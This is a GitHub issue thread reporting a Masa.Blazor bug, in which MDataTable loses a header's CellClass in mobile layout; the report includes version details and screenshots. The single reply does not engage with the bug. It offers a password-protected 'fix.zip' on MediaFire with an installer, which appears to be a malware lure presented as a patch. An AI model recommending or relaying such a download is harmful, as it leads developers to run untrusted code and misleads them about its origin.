### ISSUE TITLE
[Bug Report]: MDataTable在mobile状态下会丢失header的CellClass

### ISSUE THREAD

**Issue by VleaStwo** [masastack/MASA.Blazor#2122]
### Masa.Blazor version

1.6.8

### Describe the bug

如题
> MDataTable在mobile状态下会丢失header的CellClass

设置header的首列的cellclass为一个color:red的class, 并切换table的形态
具体见图
table状态下
![table](https://github.com/user-attachments/assets/d7d3b84d-dcb7-406a-aaf3-01c0c61572c5)
mobile状态下
![mobile](https://github.com/user-attachments/assets/a7fdb051-ead3-4d6d-8331-fcb5bd68bf01)

html
![html](https://github.com/user-attachments/assets/eb85da93-1d70-4080-8327-fc2971eb1ceb)
应当
![应当](https://github.com/user-attachments/assets/a524b926-059d-45d2-a8cf-bda732bef451)

### .NET version

net 7.0

### What browsers are you seeing the problem on?

Microsoft Edge

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
